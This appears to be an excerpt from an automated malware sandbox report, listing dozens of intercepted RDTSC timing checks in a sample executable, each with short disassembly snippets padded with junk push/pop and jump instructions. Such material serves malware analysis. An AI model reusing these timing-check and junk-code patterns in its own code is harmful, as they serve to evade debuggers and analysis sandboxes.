Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 113A55C second address: 113A564 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 113A564 second address: 113A575 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD2CCE084FAh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 113A575 second address: 113A591 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD2CC8277F2h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 113A591 second address: 113A595 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 113A595 second address: 113A59B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 1140E42 second address: 1140E46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 1140F9B second address: 1140F9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 1140F9F second address: 1140FA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11415AE second address: 11415C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push edi 0x00000006 pop edi 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop ecx 0x0000000a push edx 0x0000000b jns 00007FD2CC8277E6h 0x00000011 pop edx 0x00000012 push ebx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 1141875 second address: 11418B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD2CCE084FAh 0x00000009 popad 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jg 00007FD2CCE084F6h 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007FD2CCE08507h 0x0000001b popad 0x0000001c jmp 00007FD2CCE084FEh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11418B6 second address: 11418D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CC8277F8h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11420AA second address: 11420BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FD2CCE084F6h 0x0000000a popad 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11420BA second address: 114210C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD2CC8277F2h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c popad 0x0000000d jnp 00007FD2CC827830h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FD2CC8277F7h 0x0000001a jmp 00007FD2CC8277F9h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 114210C second address: 1142116 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 1142116 second address: 114211A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 114211A second address: 114211E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11423BC second address: 11423C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007FD2CC8277ECh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11423C9 second address: 11423CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11423CD second address: 11423D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11423D3 second address: 11423E0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11423E0 second address: 11423EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FD2CC8277E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11429FC second address: 1142A23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CCE084FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD2CCE08500h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 1142A23 second address: 1142A27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 114759B second address: 11475A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11475A1 second address: 11475A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11475A5 second address: 11475A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11475A9 second address: 11475B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11475B3 second address: 11475B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 114B3D1 second address: 114B3D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 114B3D7 second address: 114B3F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007FD2CCE084F6h 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 114B3F1 second address: 114B408 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CC8277F3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 114B408 second address: 114B416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FD2CCE084F8h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 114A522 second address: 114A538 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CC8277EBh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 114A684 second address: 114A6AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007FD2CCE08508h 0x0000000b popad 0x0000000c jp 00007FD2CCE084F8h 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 114A6AF second address: 114A6B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 114A94D second address: 114A951 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 114AC82 second address: 114AC88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 114B096 second address: 114B09C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 114B09C second address: 114B0BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jo 00007FD2CC8277E6h 0x0000000f pop edx 0x00000010 popad 0x00000011 js 00007FD2CC827804h 0x00000017 pushad 0x00000018 jng 00007FD2CC8277E6h 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 114B0BE second address: 114B0C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 114B0C6 second address: 114B0CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 114D757 second address: 114D76F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FD2CCE08503h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 114D76F second address: 114D794 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD2CC8277EBh 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FD2CC8277ECh 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11560EC second address: 1156104 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD2CCE084FCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 1156104 second address: 1156108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 1156108 second address: 115610C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 115610C second address: 115612B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007FD2CC8277F6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 1156ECB second address: 1156ED4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 1156ED4 second address: 1156EEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD2CC8277F5h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 1156EEF second address: 1156EF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 115CD7C second address: 115CD8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 push ecx 0x0000000a jbe 00007FD2CC8277E6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 116A4BA second address: 116A4C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 116A4C0 second address: 116A4C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 116A090 second address: 116A094 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 1177616 second address: 1177620 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FD2CC8277E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 1177620 second address: 117763C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CCE08508h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 117DEF0 second address: 117DEF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 1180938 second address: 118093E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 118093E second address: 118094D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007FD2CC8277E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 1188238 second address: 118823C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 118823C second address: 1188240 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 1188240 second address: 1188246 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11883DA second address: 11883E0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11883E0 second address: 11883F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FD2CCE084FEh 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10ABB10 second address: 10ABB1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 118893E second address: 1188944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 1188944 second address: 1188948 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 1188948 second address: 118894C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 118894C second address: 1188971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FD2CC8277E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FD2CC8277F6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 1188971 second address: 1188998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD2CCE084FDh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FD2CCE084FFh 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 1188B1F second address: 1188B3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD2CC8277F9h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 1188B3D second address: 1188B8C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FD2CCE084FAh 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FD2CCE084FEh 0x00000013 ja 00007FD2CCE084F6h 0x00000019 jmp 00007FD2CCE08509h 0x0000001e popad 0x0000001f jno 00007FD2CCE084FEh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 1188B8C second address: 1188B92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 1188B92 second address: 1188B9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FD2CCE084F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11AAB30 second address: 11AAB34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11AAB34 second address: 11AAB38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11AAB38 second address: 11AAB3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11AAB3E second address: 11AAB43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11AA668 second address: 11AA672 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FD2CC8277E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11AA672 second address: 11AA68D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CCE08505h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11AA68D second address: 11AA692 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11AA819 second address: 11AA845 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CCE084FAh 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007FD2CCE084F6h 0x0000000f jmp 00007FD2CCE08508h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11AA845 second address: 11AA854 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11AA854 second address: 11AA859 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11AA859 second address: 11AA871 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD2CC8277ECh 0x00000008 jp 00007FD2CC8277E6h 0x0000000e push eax 0x0000000f push edx 0x00000010 jnc 00007FD2CC8277E6h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11C1771 second address: 11C1775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11C1775 second address: 11C179E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CC8277EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FD2CC8277F3h 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11C179E second address: 11C17BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FD2CCE08500h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11C17BA second address: 11C17BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11C17BE second address: 11C17C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11C17C6 second address: 11C17D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 je 00007FD2CC8277E6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11C4F4F second address: 11C4F53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11C5211 second address: 11C5241 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD2CC8277F3h 0x00000009 jmp 00007FD2CC8277F9h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11C53AB second address: 11C53AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11C53AF second address: 11C53E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FD2CC8277F6h 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jng 00007FD2CC8277E6h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b jng 00007FD2CC8277E6h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11C5524 second address: 11C5528 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11C5528 second address: 11C552E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
